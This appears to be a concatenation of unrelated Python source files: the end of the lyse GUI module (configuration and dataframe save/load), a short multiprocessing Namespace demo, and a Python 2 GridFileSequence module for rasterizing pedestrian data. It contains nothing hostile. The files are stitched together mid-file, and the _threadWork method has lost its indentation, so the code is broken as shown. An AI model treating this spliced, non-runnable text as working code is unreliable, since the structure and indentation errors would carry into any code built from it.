    box = self.singleshot_routinebox
    save_data['SingleShot'] = list(zip([routine.filepath for routine in box.routines],
                                       [box.model.item(row, box.COL_ACTIVE).checkState()
                                        for row in range(box.model.rowCount())]))
    save_data['LastSingleShotFolder'] = box.last_opened_routine_folder
    # Same for multi-shot routines:
    box = self.multishot_routinebox
    save_data['MultiShot'] = list(zip([routine.filepath for routine in box.routines],
                                      [box.model.item(row, box.COL_ACTIVE).checkState()
                                       for row in range(box.model.rowCount())]))
    save_data['LastMultiShotFolder'] = box.last_opened_routine_folder
    save_data['LastFileBoxFolder'] = self.filebox.last_opened_shots_folder
    save_data['analysis_paused'] = self.filebox.analysis_paused
    # Window geometry (stored as plain tuples/lists so the config file can
    # be parsed back with ast.literal_eval):
    window_size = self.ui.size()
    save_data['window_size'] = (window_size.width(), window_size.height())
    window_pos = self.ui.pos()
    save_data['window_pos'] = (window_pos.x(), window_pos.y())
    # Recorded so geometry is only restored on an identical monitor setup:
    save_data['screen_geometry'] = get_screen_geometry()
    save_data['splitter'] = self.ui.splitter.sizes()
    save_data['splitter_vertical'] = self.ui.splitter_vertical.sizes()
    save_data['splitter_horizontal'] = self.ui.splitter_horizontal.sizes()
    return save_data
def save_configuration(self, save_file):
    """Write the current GUI state to save_file and remember it so later
    unsaved-changes checks can compare against what was saved."""
    lyse_config = LabConfig(save_file)
    state = self.get_save_data()
    # Record what was saved, and where, for change tracking:
    self.last_save_config_file = save_file
    self.last_save_data = state
    for name, value in state.items():
        lyse_config.set('lyse_state', name, pprint.pformat(value))
def on_load_configuration_triggered(self):
    """Prompt for a config file and load it, offering to save unsaved changes first."""
    save_data = self.get_save_data()
    # Offer to save any unsaved changes before replacing the current state:
    if self.last_save_data is not None and save_data != self.last_save_data:
        message = ('Current configuration (which groups are active/open and other GUI state) '
                   'has changed: save config file \'%s\'?' % self.last_save_config_file)
        reply = QtWidgets.QMessageBox.question(self.ui, 'Load configuration', message,
                                               QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No | QtWidgets.QMessageBox.Cancel)
        if reply == QtWidgets.QMessageBox.Cancel:
            return
        if reply == QtWidgets.QMessageBox.Yes:
            self.save_configuration(self.last_save_config_file)
    # Default the dialog to the last used config file, if any:
    if self.last_save_config_file is not None:
        default = self.last_save_config_file
    else:
        default = os.path.join(self.exp_config.get('paths', 'experiment_shot_storage'), 'lyse.ini')
    file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
                                                 'Select lyse configuration file to load',
                                                 default,
                                                 "config files (*.ini)")
    # Some Qt bindings return (filename, filter) tuples:
    if type(file) is tuple:
        file, _ = file
    if not file:
        # User cancelled
        return
    # Convert to standard platform specific path, otherwise Qt likes
    # forward slashes:
    file = os.path.abspath(file)
    self.load_configuration(file)
def load_configuration(self, filename, restore_window_geometry=True):
    """Restore GUI state (loaded routines, last-used folders, pause state
    and optionally window geometry) from a saved config file.

    @param filename: path to a lyse .ini config file.
    @param restore_window_geometry: if True, also restore window
        size/position and splitter states from the file.
    """
    self.last_save_config_file = filename
    self.ui.actionSave_configuration.setText('Save configuration %s' % filename)
    lyse_config = LabConfig(filename)

    # Sentinel distinguishing 'option absent' from a stored value of None:
    _missing = object()

    def get_state(key):
        # Return the parsed value of key in [lyse_state], or _missing if the
        # option (or the whole section) is not present in the file.
        try:
            return ast.literal_eval(lyse_config.get('lyse_state', key))
        except (LabConfig.NoOptionError, LabConfig.NoSectionError):
            return _missing

    value = get_state('SingleShot')
    if value is not _missing:
        self.singleshot_routinebox.add_routines(value, clear_existing=True)
    value = get_state('LastSingleShotFolder')
    if value is not _missing:
        self.singleshot_routinebox.last_opened_routine_folder = value
    value = get_state('MultiShot')
    if value is not _missing:
        self.multishot_routinebox.add_routines(value, clear_existing=True)
    value = get_state('LastMultiShotFolder')
    if value is not _missing:
        self.multishot_routinebox.last_opened_routine_folder = value
    value = get_state('LastFileBoxFolder')
    if value is not _missing:
        self.filebox.last_opened_shots_folder = value
    value = get_state('analysis_paused')
    if value is not _missing and value:
        self.filebox.pause_analysis()
    if restore_window_geometry:
        self.load_window_geometry_configuration(filename)
    # Record the restored state so unsaved changes can be detected later:
    save_data = self.get_save_data()
    self.last_save_data = save_data
    self.ui.actionSave_configuration_as.setEnabled(True)
    self.ui.actionRevert_configuration.setEnabled(True)
def load_window_geometry_configuration(self, filename):
    """Load only the window geometry from the config file. It's useful to have this
    separate from the rest of load_configuration so that it can be called before the
    window is shown."""
    lyse_config = LabConfig(filename)
    try:
        # Values were written with pprint.pformat, so literal_eval parses them back:
        screen_geometry = ast.literal_eval(lyse_config.get('lyse_state', 'screen_geometry'))
    except (LabConfig.NoOptionError, LabConfig.NoSectionError):
        pass
    else:
        # Only restore the window size and position, and splitter
        # positions if the screen is the same size/same number of monitors
        # etc. This prevents the window moving off the screen if say, the
        # position was saved when 2 monitors were plugged in but there is
        # only one now, and the splitters may not make sense in light of a
        # different window size, so better to fall back to defaults:
        current_screen_geometry = get_screen_geometry()
        if current_screen_geometry == screen_geometry:
            # Each option is optional: restore whatever is present and
            # silently skip the rest.
            try:
                self.ui.resize(*ast.literal_eval(lyse_config.get('lyse_state', 'window_size')))
            except (LabConfig.NoOptionError, LabConfig.NoSectionError):
                pass
            try:
                self.ui.move(*ast.literal_eval(lyse_config.get('lyse_state', 'window_pos')))
            except (LabConfig.NoOptionError, LabConfig.NoSectionError):
                pass
            try:
                self.ui.splitter.setSizes(ast.literal_eval(lyse_config.get('lyse_state', 'splitter')))
            except (LabConfig.NoOptionError, LabConfig.NoSectionError):
                pass
            try:
                self.ui.splitter_vertical.setSizes(ast.literal_eval(lyse_config.get('lyse_state', 'splitter_vertical')))
            except (LabConfig.NoOptionError, LabConfig.NoSectionError):
                pass
            try:
                self.ui.splitter_horizontal.setSizes(ast.literal_eval(lyse_config.get('lyse_state', 'splitter_horizontal')))
            except (LabConfig.NoOptionError, LabConfig.NoSectionError):
                pass
def setup_config(self):
    """Load the labconfig file, requiring the options lyse depends on."""
    required = {
        "DEFAULT": ["experiment_name"],
        "programs": [
            "text_editor",
            "text_editor_arguments",
            "hdf5_viewer",
            "hdf5_viewer_arguments",
        ],
        "paths": [
            "shared_drive",
            "experiment_shot_storage",
            "analysislib",
        ],
        "ports": ["lyse"],
    }
    self.exp_config = LabConfig(required_params=required)
def connect_signals(self):
    """Hook up OS-specific window handling and global keyboard shortcuts."""
    if os.name == 'nt':
        # NOTE(review): presumably sets the Windows AppUserModelID so the
        # window gets its own taskbar entry - confirm against set_win_appusermodel.
        self.ui.newWindow.connect(set_win_appusermodel)
    # Keyboard shortcuts: Del deletes with confirmation, Shift+Del without.
    QtWidgets.QShortcut('Del', self.ui, lambda: self.delete_items(True))
    QtWidgets.QShortcut('Shift+Del', self.ui, lambda: self.delete_items(False))
def on_save_dataframe_triggered(self, choose_folder=True):
    """Export the current shots dataframe to msgpack files, one per sequence.

    @param choose_folder: if True, ask the user for an output folder; if
        False, save each sequence's dataframe next to its first shot file.
    """
    df = self.filebox.shots_model.dataframe.copy()
    if len(df) == 0:
        error_dialog('Dataframe is empty')
        return
    default = self.exp_config.get('paths', 'experiment_shot_storage')
    if choose_folder:
        save_path = QtWidgets.QFileDialog.getExistingDirectory(self.ui, 'Select a Folder for the Dataframes', default)
        # Some Qt bindings return (path, filter) tuples:
        if type(save_path) is tuple:
            save_path, _ = save_path
        if not save_path:
            # User cancelled
            return
    sequences = df.sequence.unique()
    for sequence in sequences:
        # One dataframe per sequence, dropping all-NaN columns:
        sequence_df = pandas.DataFrame(df[df['sequence'] == sequence], columns=df.columns).dropna(axis=1, how='all')
        labscript = sequence_df['labscript'].iloc[0]
        # Filename encodes the sequence timestamp and the labscript name (sans '.py'):
        filename = "dataframe_{}_{}.msg".format(sequence.to_pydatetime().strftime("%Y%m%dT%H%M%S"), labscript[:-3])
        if not choose_folder:
            save_path = os.path.dirname(sequence_df['filepath'].iloc[0])
        # BUG FIX: infer_objects() returns a new dataframe; the previous
        # code discarded the result, making the call a no-op.
        sequence_df = sequence_df.infer_objects()
        for col in sequence_df.columns:
            if sequence_df[col].dtype == object:
                sequence_df[col] = pandas.to_numeric(sequence_df[col], errors='ignore')
        sequence_df.to_msgpack(os.path.join(save_path, filename))
def on_load_dataframe_triggered(self):
    """Load a previously exported dataframe, re-analysing any shot files
    that changed on disk since the dataframe was saved."""
    default = os.path.join(self.exp_config.get('paths', 'experiment_shot_storage'), 'dataframe.msg')
    file = QtWidgets.QFileDialog.getOpenFileName(self.ui,
                                                 'Select dataframe file to load',
                                                 default,
                                                 "dataframe files (*.msg)")
    # Some Qt bindings return (filename, filter) tuples:
    if type(file) is tuple:
        file, _ = file
    if not file:
        # User cancelled
        return
    # Convert to standard platform specific path, otherwise Qt likes
    # forward slashes:
    file = os.path.abspath(file)
    df = pandas.read_msgpack(file).sort_values("run time").reset_index()

    # Check for changes in the shot files since the dataframe was exported
    def changed_since(filepath, mtime_threshold):
        # Missing files are treated as unchanged (they can't be re-analysed):
        if os.path.isfile(filepath):
            return os.path.getmtime(filepath) > mtime_threshold
        return False

    filepaths = df["filepath"].tolist()
    changetime_cache = os.path.getmtime(file)
    # BUG FIX: np.where() needs a real boolean sequence; under Python 3 the
    # previous np.where(map(...)) received a lazy map object and did not
    # evaluate the condition element-wise.
    changed = [changed_since(path, changetime_cache) for path in filepaths]
    need_updating = np.where(changed)[0]
    # Sort in descending order so pop() doesn't shift the remaining indices:
    need_updating = np.sort(need_updating)[::-1]
    # Reload the files where changes were made since exporting:
    for index in need_updating:
        filepath = filepaths.pop(index)
        self.filebox.incoming_queue.put(filepath)
    df = df.drop(need_updating)
    self.filebox.shots_model.add_files(filepaths, df, done=True)
def delete_items(self, confirm):
    """Delete the selected items from whichever box currently has keyboard
    focus, optionally asking for confirmation first."""
    focus_targets = (
        (self.filebox.ui.tableView, self.filebox.shots_model.remove_selection),
        (self.singleshot_routinebox.ui.treeView, self.singleshot_routinebox.remove_selection),
        (self.multishot_routinebox.ui.treeView, self.multishot_routinebox.remove_selection),
    )
    for widget, remove_selection in focus_targets:
        if widget.hasFocus():
            remove_selection(confirm)
if __name__ == "__main__":
    # Application entry point: logging, Qt setup, main window, web server.
    logger = setup_logging('lyse')
    labscript_utils.excepthook.set_logger(logger)
    logger.info('\n\n===============starting===============\n')
    qapplication = QtWidgets.QApplication(sys.argv)
    qapplication.setAttribute(QtCore.Qt.AA_DontShowIconsInMenus, False)
    # Construct the main application window/object:
    app = Lyse()
    # Start the web server:
    splash.update_text('starting analysis server')
    server = WebServer(app.port)
    splash.update_text('done')
    # Let the interpreter run every 500ms so it sees Ctrl-C interrupts:
    timer = QtCore.QTimer()
    timer.start(500)
    timer.timeout.connect(lambda: None) # Let the interpreter run each 500 ms.
    # Upon seeing a ctrl-c interrupt, quit the event loop
    signal.signal(signal.SIGINT, lambda *args: qapplication.exit())
    splash.hide()
    # Blocks until the Qt event loop exits, then shut the server down:
    qapplication.exec_()
    server.shutdown()
|
manager.py | import multiprocessing
def task(ns):
    """Print the namespace's current x, then overwrite it with 2."""
    current = ns.x
    print(current)  # shows the value set by the parent process (1)
    ns.x = 2
def main():
    """Demonstrate sharing a manager Namespace between processes."""
    # A Manager runs a server process that hosts shared proxy objects:
    manager = multiprocessing.Manager()
    ns = manager.Namespace()
    ns.x = 1
    print(ns) # Namespace(x=1)
    process = multiprocessing.Process(target=task, args=(ns, ))
    process.start()
    process.join() # print 1
    # The child's assignment to ns.x is visible here because the Namespace
    # proxy forwards attribute access to the manager process:
    print(ns) # Namespace(x=2)
if __name__ == '__main__':
    main()
|
GridFileSequence.py | # This file contain GridFileSquence class which create grid for squence of frame
import numpy as np
import struct
import threading
import time
import multiprocessing
import os
from stats import StatRecord
from Grid import *
from RasterGrid import RasterGrid
from primitives import Vector2
from ThreadRasterization import *
import Kernels
import Signals
THREAD_COUNT = 1#max( 1, multiprocessing.cpu_count() / 2 )
##THREAD_COUNT = multiprocessing.cpu_count() - 1
# the thread that does the file output
def threadOutput( outFile, buffer, bufferLock, startTime, gfs ):
    """Reads grids from the buffer and writes them to the output file.

    Runs on a dedicated writer thread.  Rasterization threads may push
    results into the shared buffer out of order, so this loop only pops the
    entry matching nextGrid, guaranteeing grids land in the file in index
    order.  It exits once the buffer is empty and gfs.activeThreadCount has
    dropped to zero (i.e. all rasterization threads are done).

    @param  outFile     An open, writable binary file object.
    @param  buffer      A python list shared with the rasterization threads.
    @param  bufferLock  A threading lock guarding access to buffer.
    @param  startTime   A float.  Reference time used for progress messages.
    @param  gfs         The owning GridFileSequence (read for activeThreadCount).
    """
    nextGrid = 0
    while ( buffer or gfs.activeThreadCount ):
        # keep doing the work as long as the buffer has contents or there are active raster threads
        bufferLock.acquire()
        try:
            # NOTE(review): buffer entries compare equal to their integer grid
            # index here - presumably the buffered objects define __eq__
            # against ints; confirm in the buffer item class.
            i = buffer.index( nextGrid )
            bg = buffer.pop( i )
            bufferLock.release()
            if ( nextGrid & 0xFF == 0 ):
                # Progress message every 256 grids:
                print "\t\tWriting buffer %d at time %f s" % ( nextGrid, time.clock() - startTime )
            outFile.write( bg.grid.binaryString() )
            nextGrid += 1
        except ValueError:
            # The next grid in sequence isn't buffered yet: release the lock
            # and wait for the rasterization threads to catch up.
            bufferLock.release()
            time.sleep( 1.0 )
    print "\t\tLast grid %d at time %f s" % ( nextGrid - 1, time.clock() - startTime )
class RasterReport:
    """Accumulates simple statistics (grid count, min and max cell values)
    produced by a rasterization thread."""
    def __init__( self ):
        self.maxVal = 0.0       # largest value seen so far
        self.minVal = 1e6       # smallest value seen so far
        self.count = 0          # number of grids processed

    def incCount( self ):
        '''Increments the number of processed grids.'''
        self.count += 1

    def setMax( self, val ):
        '''Raises the running maximum to val if val exceeds it.'''
        self.maxVal = max( self.maxVal, val )

    def setMin( self, val ):
        '''Lowers the running minimum to val if val is below it.'''
        self.minVal = min( self.minVal, val )
# Numpy cell types supported by the file format, and a reverse lookup from
# dtype to the integer id stored in a sequence file's header.
NP_TYPES = ( np.float32, np.float64, np.int8, np.int16, np.int32, np.int64 )
TYPE_ID_MAP = dict( ( dtype, index ) for index, dtype in enumerate( NP_TYPES ) )
class GridFileSequenceReader:
    '''A simple class for reading and iterating through a GridFileSequence.

    The file layout is a fixed header (domain corner, domain size, grid
    resolution, cell data type, grid count, value range) followed by the raw
    cell data of each grid, back to back.'''
    def __init__( self, fileName, startGrid=0, maxGrids=-1, gridStep=1 ):
        '''Initializes the reader to a particular file.
        @param  fileName        A string.  The path to a grid file sequence file.
        @param  startGrid       An int.  The first grid to return in the sequence.
                                (Defaults to 0, the first grid.)
        @param  maxGrids        An int.  The maximum number of grids to iterate through.
                                If negative, all grids in the file will be used.  If
                                non-negative, it iterates through min( maxGrids, count).
        @param  gridStep        An int.  The stride between accessible grids.
                                The default is 1 (every grid.)
        @raises     IOError if the file doesn't exist.
        '''
        self.file = open( fileName, 'rb' )
        # read the header
        self.readHeader()
        self.currGridID = 0
        self.startGrid = startGrid
        if ( maxGrids == -1 ):
            self.maxGrids = self.count
        else:
            # BUG FIX: previously computed min( self.count, self.maxGrids ),
            # reading self.maxGrids before it had been assigned (an
            # AttributeError).  The *parameter* is what must be clamped to
            # the file's grid count.
            self.maxGrids = min( self.count, maxGrids )
        assert( gridStep > 0 )
        # Bytes to skip after each read so that only every gridStep-th grid is visited:
        self.gridStride = self.gridSize() * ( gridStep - 1 )
        self.currGrid = DataGrid( self.corner, self.size, ( self.w, self.h ), arrayType=self.arrayType, leaveEmpty=True )
        # NOTE(review): not used by the reader itself; presumably retained for
        # interface parity with the writer class - confirm before removing.
        self.activeThreadCount = 0

    def __str__( self ):
        return self.summary()

    def getCellSize( self ):
        '''Reports the cellsize of the grid.
        @returns        A 2-tuple of floats.  The cell size in the x- and y-directions.'''
        return ( self.size[0] / self.w, self.size[1] / self.h )

    def summary( self ):
        '''Produces a string which summarizes the sequence'''
        s = "Grid file sequence"
        s += "\n\tMinimum corner:  (%.2f, %.2f)" % ( self.corner[0], self.corner[1] )
        s += '\n\tSize:            (%.2f, %.2f)' % ( self.size[0], self.size[1] )
        s += '\n\tResolution:      (%d, %d )' % ( self.w, self.h )
        s += '\n\tGrid count:      %d' % self.count
        s += '\n\tData type:       %s' % str( self.arrayType )
        s += '\n\tData range:      (%s, %s)' % ( str( self.range[0] ), str( self.range[1] ) )
        return s

    def readHeader( self ):
        '''Reads the header of the open file.

        Populates corner, size, resolution (w, h), cell dtype, grid count and
        value range, and records the total header size in bytes.'''
        corner = struct.unpack( 'ff', self.file.read( 8 ) )
        self.corner = Vector2( corner[0], corner[1] )
        size = struct.unpack( 'ff', self.file.read( 8 ) )
        self.size = Vector2( size[0], size[1] )
        self.w, self.h = struct.unpack( 'ii', self.file.read( 8 ) )
        # The dtype is stored as an index into the module-level NP_TYPES table:
        self.arrayType = np.dtype( NP_TYPES[ struct.unpack( 'i', self.file.read( 4 ) )[0] ] )
        self.count = struct.unpack( 'i', self.file.read( 4 ) )[0]
        self.range = struct.unpack( self.arrayType.char * 2, self.file.read( self.arrayType.itemsize * 2 ) )
        # 32 fixed bytes (4 floats + 4 ints) plus two range values:
        self.headerSize = 32 + self.arrayType.itemsize * 2

    def gridSize( self ):
        '''Returns the size of a grid in bytes.
        @returns        The number of bytes in a single frame.
        '''
        # BUG FIX: was hard-coded to 4 bytes per cell (float32 only); use the
        # actual item size so non-float32 sequences are read correctly.
        return self.w * self.h * self.arrayType.itemsize

    def gridCount( self ):
        '''Returns the number of grids in the sequence.
        @returns        An int.  The number of grids (not in the file, but the number
                        to be iterated across accounting for startGrid, maxGrids and gridStep.'''
        return self.maxGrids

    def __iter__( self ):
        '''Returns an iterator to the grids (it is itself).

        The iterator continues from the current state of the reader.  I.e. if it is currently on
        frame 5, the iterator will start on frame 5.  It is the responsibility of the caller to
        call setNext(0) on the sequence before using it as an interable if the caller wants to
        iterate over all values.
        '''
        return self

    def setNext( self, gridID ):
        '''Sets the reader so that the grid returned on the next invocaiton of "next" is gridID.
        @param      gridID      An int.  The index of the next next grid.  Should be in the range [0, self.count ).
        '''
        assert( gridID >= 0 and gridID <= self.maxGrids )
        # NOTE(review): given the assert above, this clamp branch is
        # unreachable; retained for safety if asserts are stripped.
        if ( gridID > self.maxGrids ):
            self.currGridID = self.maxGrids
        else:
            self.currGridID = gridID - 1
        size = self.gridSize()
        # Seek to the absolute byte offset of the requested grid, accounting
        # for the header, the start offset and any stride between grids:
        byteAddr = self.headerSize + ( self.startGrid + gridID ) * size + ( gridID * self.gridStride )
        self.file.seek( byteAddr, 0 )

    def next( self ):
        '''Returns the next frame in the sequence.
        @returns        A 2-tuple ( grid, gridID ).  It returns a numpy array consisting of the
                        grid (with shape ( self.w, self.h )) and the index of that grid.  The
                        index value is with respect to the stride and starting grid.
        @raises     StopIteration when there are no more grids.
        '''
        if ( self.currGridID + 1 >= self.maxGrids ):
            raise StopIteration
        dataCount = self.w * self.h
        try:
            self.currGrid.cells[:, :] = np.reshape( np.fromstring( self.file.read( self.gridSize() ), self.arrayType, dataCount), ( self.w, self.h ) )
        except ValueError:
            # A short read (truncated file) can't be reshaped - treat as exhausted:
            raise StopIteration
        self.currGridID += 1
        if ( self.gridStride ):
            self.file.seek( self.gridStride, 1 )    # 1 = seek offset from current position
        return self.currGrid, self.currGridID

    @property
    def domain( self ):
        '''Returns the domain of the GridFileSequence data.
        @returns        An instance of Grid.AbstractGrid.
        '''
        return AbstractGrid( self.corner, self.size, ( self.w, self.h ) )
class GridFileSequence:
"""Creates a grid sequence from a frame file and streams the resulting grids to
a file"""
# different ways of visualizing speed
BLIT_SPEED = 0 # simply blit the agent to the cell center with his speed
NORM_SPEED = 1 # distribute speed with a normalized gaussian
UNNORM_SPEED = 2 # distribute speed with an unnormalized gaussian
NORM_DENSE_SPEED = 3 # distribute speed with normalized gaussian and then divide by the density
NORM_CONTRIB_SPEED = 4 # distribute speed with normalized gaussian and then divide by contribution matrix
LAPLACE_SPEED = 5 # compute the magnitude of the laplacian of the velocity field
    def __init__( self, outFileName, obstacles=None, arrayType=np.float32 ):
        """Constructs a GridFileSequence which caches to the indicated file name.
        @param  outFileName     The name of the file to which the gridFileSequence writes.
        @param  obstacles       An optional obstacleHandler object.  Used for obstacle-dependent
                                computations.
        @param  arrayType       A numpy datatype.  Defaults to np.float32.
        """
        self.outFileName = outFileName
        # TODO: This currently doesn't have any effect.  Eventually, it can be used for object-aware convolution
        # or other operations.
        self.obstacles = obstacles
        self.arrayType = np.dtype( arrayType )
        # 40 = 32 fixed bytes + 2 x 4-byte range values; header() recomputes
        # the exact value when it is called.
        self.headerSize = 40 # this assumes that the arrayType is np.float32
    def header( self, corner, size, resolution ):
        '''Prepares a string for the header of the grid file sequence.

        It is assumed that some of the information is unknown (min/max vals, grid count) and zero
        place holders will be inserted for later replacement (see fillInHeader).
        @param  corner      A Vector2 instance.  The left-bottom corner of the grid's domain
                            (i.e. the minimum x- and y-values).
        @param  size        A Vector2 instance.  The width and height of the grid's domain.
        @param  resolution  A 2-tuple of ints.  Indicates the (width, height) of the grid.
        @returns    A binary string which represents the header information for this file sequence.
        '''
        s = struct.pack( 'ff', corner[0], corner[1] )           # minimum corner of grid
        s += struct.pack( 'ff', size[0], size[1] )              # domain width and height
        s += struct.pack( 'ii', resolution[0], resolution[1] )  # size of grid (cell counts)
        s += struct.pack( 'i', TYPE_ID_MAP[ self.arrayType.type ] )     # the data type of the grids
        s += struct.pack( 'i', 0 )                              # grid count (placeholder)
        s += struct.pack( 2 * self.arrayType.char, 0, 0 )       # range of grid values (placeholder)
        # Record the true header size for this dtype (fixed 32 bytes + range):
        self.headerSize = len( s )
        return s
    def fillInHeader( self, file, gridCount, minVal, maxVal ):
        '''Writes the final grid count, minimum and maximum values to the file's header section.

        This assumes that the original header had been already written and the sequence has been
        fully created and written to the file.  Now, the post hoc derived values must be set into
        the header.
        @param  file        An open file object.
        @param  gridCount   An int.  The number of grids in the file.
        @param  minVal      A value of type self.arrayType.  The minimum value across all grids.
        @param  maxVal      A value of type self.arrayType.  The maximum value across all grids.
        '''
        # 28 = bytes preceding the grid-count field: 2 floats (corner) +
        # 2 floats (size) + 2 ints (resolution) + 1 int (type id).
        file.seek( 28 )
        file.write( struct.pack( 'i', gridCount ) )
        file.write( struct.pack( 2 * self.arrayType.char, minVal, maxVal ) )
    def renderTraces( self, minCorner, size, resolution, frameSet, preWindow, postWindow, fileBase ):
        """Creates a sequence of images of the traces of the agents.

        The trace extends temporally backwards preWindow frames.
        The trace extends temporally forwards postWindow frames.
        The dimensions of the rasterized grid are determined by: minCorner, size, resolution.
        The rendered colors are then output via the colorMap and fileBase name.
        """
        # Thin wrapper: delegates to the module-level renderTraces function
        # (imported via the star imports at the top of the file).
        renderTraces( minCorner, size, resolution, frameSet, preWindow, postWindow, fileBase )
    def computeDifference( self, reader1, reader2 ):
        '''Computes the per-frame difference between two grid file sequences and saves it.
        @param  reader1     An instance of a GridFileSequenceReader.
        @param  reader2     An instance of a GridFileSequenceReader.
        @returns    A string.  The name of the file created.
        '''
        # The two sequences must cover the same domain, resolution and frame count:
        assert( reader1.w == reader2.w )
        assert( reader1.h == reader2.h )
        assert( reader1.count == reader2.count )
        assert( reader1.corner == reader2.corner )
        assert( reader1.size == reader2.size )
        fileName = self.outFileName + '.error'
        outFile = open( fileName, 'wb' )
        # Write a placeholder header; the count/range are filled in afterwards:
        outFile.write( self.header( reader1.corner, reader1.size, ( reader1.w, reader1.h ) ) )
        reader1.setNext( 0 )
        reader2.setNext( 0 )
        maxError = 0
        while( True ):
            try:
                frame1, frameID1 = reader1.next()
                frame2, frameID2 = reader2.next()
            except StopIteration:
                break
            # Per-cell absolute difference; the minimum possible value is 0:
            err = np.abs( frame1.cells - frame2.cells )
            outFile.write( err.tostring() )
            ERR = err.max()
            if ( ERR > maxError ):
                maxError = ERR
        self.fillInHeader( outFile, reader1.count, 0.0, maxError )
        outFile.close()
        return fileName
    def convolveSignal( self, gridDomain, kernel, signal, frameSet, overwrite=True ):
        '''Creates a binary file representing the density scalar fields of each frame of the
        pedestrian data.
        @param      gridDomain      An instance of AbstractGrid, specifying the grid domain
                                    and resolution over which the density field is calculated.
        @param      kernel          The kernel to be used to create the scalar field.  It is
                                    convolved with the pedestrian data.
        @param      signal          An instance of the signal type to be convolved.  It includes the
                                    signal domain.  The data for the signal is set in each iteration
                                    by the data in frameSet.
        @param      frameSet        An instance of a pedestrian data sequence (could be simulated
                                    or real data.  It could be a sequence of voronoi diagrams.
        @param      overwrite       A boolean.  Indicates whether files should be created even if they
                                    already exist or computed from scratch.  If True, they are always created,
                                    if False, pre-existing files are used.
        @returns    A string.  The name of the output file.
        '''
        print "Convolve signal"
        print "\t", gridDomain
        print "\t", kernel
        print "\t", signal
        print "\t", frameSet
        # Start reading frames from the beginning of the sequence:
        frameSet.setNext( 0 )
        # Each worker thread gets its own empty copy of the signal via
        # copyEmpty(), so threads don't share mutable signal state:
        argsFunc = lambda: ( signal.copyEmpty(), frameSet, gridDomain, kernel )
        return self._threadWork( 'density', threadConvolve, argsFunc, gridDomain, overwrite )
    def computeVoronoiDensity( self, gridDomain, frameSet, obstacles=None, limit=-1 ):
        '''Computes a density field for the frameset based on the voronoi diagram.

        The density of each voronoi region is the inverse of the area of that region.
        @param      gridDomain      An instance of AbstractGrid, specifying the grid domain
                                    and resolution over which the density field is calculated.
        @param      frameSet        An instance of a pedestrian data sequence (could be simulated
                                    or real data.  It could be a sequence of voronoi diagrams.
        @param      obstacles       An instance of ?????.  Used for performing the constrained voronoi
                                    based on obstacles.
        @param      limit           A float.  The maximum distance a point can be and still lie
                                    in a voronoi region.
        @returns    A string.  The name of the output file.
        '''
        print "computeVoronoiDensity"
        print "\t", gridDomain
        print "\t", frameSet
        # Start reading frames from the beginning of the sequence:
        frameSet.setNext( 0 )
        argsFunc = lambda: ( frameSet, gridDomain, obstacles, limit )
        # Output extension 'voronoiDensity'; work done by threadVoronoiDensity:
        return self._threadWork( 'voronoiDensity', threadVoronoiDensity, argsFunc, gridDomain )
    def computeVoronoi( self, gridDomain, frameSet, obstacles=None, limit=-1 ):
        '''Computes the voronoi diagram fields for the frameset.

        NOTE(review): the original docstring duplicated computeVoronoiDensity's
        description; this variant dispatches to threadVoronoi rather than
        threadVoronoiDensity - confirm the intended output semantics there.
        @param      gridDomain      An instance of AbstractGrid, specifying the grid domain
                                    and resolution over which the field is calculated.
        @param      frameSet        An instance of a pedestrian data sequence (could be simulated
                                    or real data.  It could be a sequence of voronoi diagrams.
        @param      obstacles       An instance of ?????.  Used for performing the constrained voronoi
                                    based on obstacles.
        @param      limit           A float.  The maximum distance a point can be and still lie
                                    in a voronoi region.
        @returns    A string.  The name of the output file.
        '''
        print "computeVoronoi"
        print "\t", gridDomain
        print "\t", frameSet
        # Start reading frames from the beginning of the sequence:
        frameSet.setNext( 0 )
        argsFunc = lambda: ( frameSet, gridDomain, obstacles, limit )
        return self._threadWork( 'voronoi', threadVoronoi, argsFunc, gridDomain )
def _threadWork( self, fileExt, function, funcArgs, gridDomain, overwrite=True ):
'''Sets up threaded work.
@param fileExt A string. The extension applied to the GFS file.
@param function A function object. The function executed by each thread.
For the function to work its first four args must be:
1. a RasterReport instance
2. a threading lock for the buffer
3. A buffer instance ( simply a python list)
4. A threading lock for the data
@param funcArgs A callable object. Its return value is a tuple of values.
These values are the additional arguments for the work function.
They will be concatenated to the arguments liated above.
This is a function, because the arguments may need to change
with each thread. This interface allows that.
@param gridDomain An instance of AbstractGrid, specifying the grid domain
and resolution over which the density field is calculated.
@param overwrite A boolean. Indicates whether files should be created even if they
already exist or computed from scratch. If True, they are always created,
if False, pre-existing files are used.
@returns A string. The name of the output file.
'''
# file output
fileName = '%s.%s' % ( self.outFileName, fileExt )
if ( not overwrite ):
if ( os.path.exists( fileName ) ):
return fileName
outFile = open( fileName, 'wb' )
outFile.write( self.header( gridDomain.minCorner, gridDomain.size, gridDomain.resolution ) )
buffer = []
bufferLock = threading.Lock()
saveThread = threading.Thread( target=threadOutput, args=(outFile, buffer, bufferLock, time.clock(), self ) )
self.activeThreadCount = THREAD_COUNT
saveThread.start()
# prepare rasterization
frameLock = threading.Lock()
rasterThreads = []
rasterLogs = []
for i in range( THREAD_COUNT ):
rasterLogs.append( RasterReport() )
# This has self.obstacles
threadArgs = ( rasterLogs[-1], bufferLock, buffer, frameLock )
rasterThreads.append( threading.Thread( target=function, args=threadArgs + funcArgs() ) )
for i in range( THREAD_COUNT ):
rasterThreads[i].start()
for i in range( THREAD_COUNT ):
rasterThreads[i].join()
self.activeThreadCount -= 1
saveThread.join()
gridCount = 0
maxVal = 0.0
minVal = 1e8
for log in rasterLogs:
gridCount += log.count
if ( log.maxVal > maxVal ):
maxVal = log.maxVal
if ( log.minVal < minVal ):
minVal = log.minVal
# add the additional information about grid count and maximum values
self.fillInHeader( outFile, gridCount, minVal, maxVal )
outFile.close()
return fileName
    def splatAgents( self, gridDomain, radius, pedData, overwrite=True ):
        '''Splats the agents onto a grid based on position and the given radius.
        @param      gridDomain      An instance of AbstractGrid, specifying the grid domain
                                    and resolution over which the density field is calculated.
        @param      radius          The size (in world units) of the agent's visualization radius.
        @param      pedData         The pedestrian data to splat (the product of a call to trajectory.loadTrajectory).
        @param      overwrite       A boolean.  Indicates whether files should be created even if they
                                    already exist or computed from scratch.  If True, they are always created,
                                    if False, pre-existing files are used.
        @returns    A string.  The name of the output file.
        '''
        # Flat (uniform) circular kernel; False disables reflection at the boundary:
        kernel = Kernels.UniformCircleKernel( radius, gridDomain.cellSize[0], False ) # False on reflect
        signal = Signals.PedestrianSignal( gridDomain.rectDomain )
        # Start reading pedestrian frames from the beginning:
